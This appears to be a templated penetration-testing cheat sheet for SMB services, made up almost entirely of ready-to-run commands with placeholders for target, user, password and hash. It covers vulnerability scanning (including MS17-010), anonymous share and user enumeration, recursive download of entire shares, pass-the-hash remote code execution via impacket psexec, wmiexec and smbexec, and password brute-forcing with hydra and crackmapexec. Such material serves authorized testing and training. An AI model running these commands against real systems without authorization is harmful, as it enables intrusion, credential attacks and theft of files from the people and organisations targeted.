# === NMAP SMB SCRIPTS ===
nmap -sV -p 139,445 --script smb-protocols,smb2-security-mode,smb-os-discovery {{TARGET}}
nmap -sV -p 139,445 --script smb-enum-shares,smb-enum-users,smb-enum-domains,smb-enum-groups {{TARGET}}
nmap -sV -p 139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args unsafe=1 {{TARGET}}
nmap -sV -p 445 --script smb-vuln-ms17-010 {{TARGET}}
sudo nbtscan -r {{TARGET}}/24

# === ANONYMOUS / GUEST ENUMERATION ===
smbmap -H {{TARGET}}
smbmap -u '' -p '' -H {{TARGET}}
smbmap -u 'guest' -p '' -H {{TARGET}} -R
crackmapexec smb {{TARGET}}
crackmapexec smb {{TARGET}} -u '' -p '' --shares
crackmapexec smb {{TARGET}} -u 'guest' -p '' --shares
enum4linux -a -u "" -p "" {{TARGET}}

# === AUTHENTICATED ENUMERATION ===
crackmapexec smb {{TARGET}} -u {{USER}} -p {{PASS}} --shares
crackmapexec smb {{TARGET}} -u {{USER}} -p {{PASS}} --rid-brute
crackmapexec smb {{TARGET}} -u {{USER}} -p {{PASS}} -d {{DOMAIN}} --continue-on-success
enum4linux -a -u {{USER}} -p {{PASS}} {{TARGET}}
rpcclient -U "{{USER}}%{{PASS}}" {{TARGET}} -c "enumdomusers;enumdomgroups;srvinfo"

# === SMBCLIENT FILE ACCESS ===
# List shares
smbclient -L //{{TARGET}} -N
smbclient -L //{{TARGET}} -U {{USER}}
# Connect and download everything
smbclient //{{TARGET}}/{{SHARE}} -N -c "prompt OFF;recurse ON;mget *"
smbclient //{{TARGET}}/{{SHARE}} -U {{USER}} -c "prompt OFF;recurse ON;mget *"
# Mount share
mkdir /tmp/smb && sudo mount -t cifs //{{TARGET}}/{{SHARE}} /tmp/smb
sudo mount -t cifs -o 'username={{USER}},password={{PASS}}' //{{TARGET}}/{{SHARE}} /tmp/smb

# === REMOTE CODE EXECUTION ===
impacket-psexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{TARGET}}
impacket-psexec {{DOMAIN}}/{{USER}}@{{TARGET}} -hashes :{{NTLM_HASH}}
impacket-wmiexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{TARGET}}
impacket-smbexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{TARGET}}

# === BRUTE FORCE ===
crackmapexec smb {{TARGET}} -u users.txt -p passwords.txt
hydra -V -f -L users.txt -P passwords.txt smb://{{TARGET}}
